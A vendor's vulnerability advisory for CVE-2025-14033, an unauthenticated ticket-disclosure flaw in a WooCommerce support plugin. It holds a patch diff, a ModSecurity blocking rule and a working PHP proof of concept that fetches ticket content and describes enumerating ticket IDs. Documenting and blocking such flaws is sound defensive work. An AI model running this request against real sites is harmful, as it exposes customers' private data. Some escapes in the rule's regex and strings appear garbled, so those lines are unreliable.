What is CVE-2025-14033?

CVE-2025-14033 is a security vulnerability in the ilGhera Support System for WooCommerce plugin for WordPress. It allows unauthenticated attackers to access sensitive support ticket information due to a missing authorization check in the ‘get_ticket_content_callback’ function.

How does this vulnerability work?

The vulnerability works by allowing any user, authenticated or not, to call an AJAX action to retrieve support ticket content using only a ticket ID. The lack of capability checks means that an attacker can easily access private communications and customer information.

Who is affected by CVE-2025-14033?

Any WordPress site using the ilGhera Support System for WooCommerce plugin version 1.3.0 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the Plugins section, and look for the ilGhera Support System for WooCommerce plugin. If the version is 1.3.0 or earlier, the site is vulnerable.

What should I do to fix this vulnerability?

To fix this vulnerability, update the ilGhera Support System for WooCommerce plugin to version 1.3.1 or later. This version removes the unauthenticated AJAX action that exposes ticket content.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin temporarily to prevent unauthorized access. Additionally, review server logs for any suspicious activity related to the AJAX endpoint.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means that while the risk is moderate, the potential for sensitive data exposure is significant, warranting prompt attention.

What type of data is at risk due to this vulnerability?

The vulnerability exposes sensitive support ticket data, which may include customer names, email addresses, order details, and private communications. This information can be exploited for identity theft or social engineering.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can send a POST request to the vulnerable AJAX endpoint with a valid ticket ID. It demonstrates that no authentication is needed to retrieve sensitive ticket content.

What are the implications of an attacker exploiting this vulnerability?

If an attacker successfully exploits this vulnerability, they can access all support tickets in the database, leading to potential identity theft, privacy violations, and damage to customer trust.

Is there any additional security measure I should consider?

In addition to applying the patch, consider implementing additional security measures such as limiting access to the admin area, using strong authentication methods, and regularly auditing plugins for vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2025-14033 can be found on the National Vulnerability Database (NVD) or through security advisories from WordPress security organizations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 12, 2026

CVE-2025-14033: ilGhera Support System for WooCommerce <= 1.3.0 – Missing Authorization to Unauthenticated Sensitive Information Exposure (wc-support-system)

CVE ID CVE-2025-14033

Plugin wc-support-system

Severity Medium (CVSS 5.3)

CWE 639

Vulnerable Version 1.3.0

Patched Version 1.3.1

Disclosed May 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14033:

This vulnerability exposes sensitive support ticket data to unauthenticated attackers. The ilGhera Support System for WooCommerce plugin registers an AJAX action that any user, logged in or not, can call. The affected function is get_ticket_content_callback in the file wc-support-system/includes/class-wc-support-system.php. By providing a numeric ticket ID, an attacker retrieves private communications and customer information. The CVSS score is 5.3, reflecting moderate severity due to confidentiality impact.

Root Cause: The vulnerability stems from a missing capability check in the get_ticket_content_callback function. The plugin registers two AJAX hooks: wp_ajax_get_ticket_content for authenticated users and wp_ajax_nopriv_get_ticket_content for unauthenticated users. Both point to the same callback method. The callback does not verify user permissions or ownership of the ticket. The only parameter required is the ticket ID. The diff shows the removal of the wp_ajax_nopriv hook, which previously exposed the endpoint to anyone. The function itself does not enforce any authorization, so removing the nopriv hook is critical.

Exploitation: An attacker sends a POST request to /wp-admin/admin-ajax.php with action=get_ticket_content and a valid ticket_id integer. The server returns the full ticket data in an AJAX response. No authentication cookie or nonce token is required. The attacker can enumerate ticket IDs sequentially to extract all support conversations. The request is simple and matches standard WordPress AJAX patterns.

Patch Analysis: The patch removes the wp_ajax_nopriv_get_ticket_content hook registration. This prevents unauthenticated users from triggering the callback via the AJAX endpoint. The wp_ajax_get_ticket_content hook remains, allowing only authenticated users (those with a WordPress session cookie) to access the action. The patch does not add a capability check inside the callback. A more complete fix would also verify the user owns or can access the requested ticket. However, the removal of the unauthenticated hook is sufficient to close the reported vulnerability.

Impact: An unauthenticated attacker can read all support tickets stored in the WordPress database. These tickets may contain sensitive customer data such as names, email addresses, order details, and personal correspondence. This information can be used for identity theft, social engineering, or competitive intelligence. The attacker does not need special privileges or knowledge beyond the ticket ID, which is a sequential integer.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wc-support-system/includes/class-wc-support-system.php
+++ b/wc-support-system/includes/class-wc-support-system.php
@@ -65,7 +65,6 @@
 		add_action( 'wp_ajax_delete-thread', array( $this, 'delete_single_thread_callback' ) );
 		add_action( 'wp_ajax_change-ticket-status', array( $this, 'change_ticket_status_callback' ) );
 		add_action( 'wp_ajax_get_ticket_content', array( $this, 'get_ticket_content_callback' ) );
-		add_action( 'wp_ajax_nopriv_get_ticket_content', array( $this, 'get_ticket_content_callback' ) );
 		add_action( 'wp_ajax_product-select-warning', array( $this, 'product_select_warning_callback' ) );
 		add_action( 'wp_ajax_nopriv_product-select-warning', array( $this, 'product_select_warning_callback' ) );
 		add_action( 'wp_footer', array( $this, 'ajax_get_ticket_content' ) );
--- a/wc-support-system/wc-support-system.php
+++ b/wc-support-system/wc-support-system.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://www.ilghera.com/product/wc-support-system/
  * Description:  Give support to your WooComerce customers with this fast and easy to use ticket system.
  * Author: ilGhera
- * Version: 1.3.0
+ * Version: 1.3.1
  * Author URI: https://ilghera.com
  * Requires at least: 5.0
  * Tested up to: 6.9
@@ -55,7 +55,7 @@
 		define( 'WSS_DIR', plugin_dir_path( __FILE__ ) );
 		define( 'WSS_URI', plugin_dir_url( __FILE__ ) );
 		define( 'WSS_INCLUDES', WSS_DIR . 'includes/' );
-		define( 'WSS_VERSION', '1.3.0' );
+		define( 'WSS_VERSION', '1.3.1' );

 		/*Files required*/
 		require WSS_INCLUDES . 'class-wc-support-system.php';

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:202514033,phase:2,deny,status:403,chain,msg:'CVE-2025-14033 - Unauthenticated ticket content access attempt',severity:'CRITICAL',tag:'CVE-2025-14033'"
SecRule ARGS_POST:action "@streq get_ticket_content" "chain"
SecRule ARGS_POST:ticket_id "@rx ^d+$" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14033 - ilGhera Support System for WooCommerce <= 1.3.0 - Missing Authorization to Unauthenticated Sensitive Information Exposure

$target_url = 'http://example.com/wp-admin/admin-ajax.php';  // Change this to your target
$ticket_id = 1;  // The ID of the target ticket

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'get_ticket_content',
    'ticket_id' => $ticket_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    echo "Ticket content retrieved successfully:n";
    print_r(json_decode($response, true));
} else {
    echo "Request failed with HTTP code " . $http_code . "n";
}

Frequently Asked Questions

What is CVE-2025-14033?
Overview of the vulnerability
CVE-2025-14033 is a security vulnerability in the ilGhera Support System for WooCommerce plugin for WordPress. It allows unauthenticated attackers to access sensitive support ticket information due to a missing authorization check in the ‘get_ticket_content_callback’ function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability works by allowing any user, authenticated or not, to call an AJAX action to retrieve support ticket content using only a ticket ID. The lack of capability checks means that an attacker can easily access private communications and customer information.
Who is affected by CVE-2025-14033?
Identifying vulnerable installations
Any WordPress site using the ilGhera Support System for WooCommerce plugin version 1.3.0 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the Plugins section, and look for the ilGhera Support System for WooCommerce plugin. If the version is 1.3.0 or earlier, the site is vulnerable.
What should I do to fix this vulnerability?
Steps for remediation
To fix this vulnerability, update the ilGhera Support System for WooCommerce plugin to version 1.3.1 or later. This version removes the unauthenticated AJAX action that exposes ticket content.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the plugin temporarily to prevent unauthorized access. Additionally, review server logs for any suspicious activity related to the AJAX endpoint.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means that while the risk is moderate, the potential for sensitive data exposure is significant, warranting prompt attention.
What type of data is at risk due to this vulnerability?
Sensitive information exposure
The vulnerability exposes sensitive support ticket data, which may include customer names, email addresses, order details, and private communications. This information can be exploited for identity theft or social engineering.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of exploitation
The proof of concept provided shows how an attacker can send a POST request to the vulnerable AJAX endpoint with a valid ticket ID. It demonstrates that no authentication is needed to retrieve sensitive ticket content.
What are the implications of an attacker exploiting this vulnerability?
Potential risks and consequences
If an attacker successfully exploits this vulnerability, they can access all support tickets in the database, leading to potential identity theft, privacy violations, and damage to customer trust.
Is there any additional security measure I should consider?
Enhancing overall security
In addition to applying the patch, consider implementing additional security measures such as limiting access to the admin area, using strong authentication methods, and regularly auditing plugins for vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14033 can be found on the National Vulnerability Database (NVD) or through security advisories from WordPress security organizations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations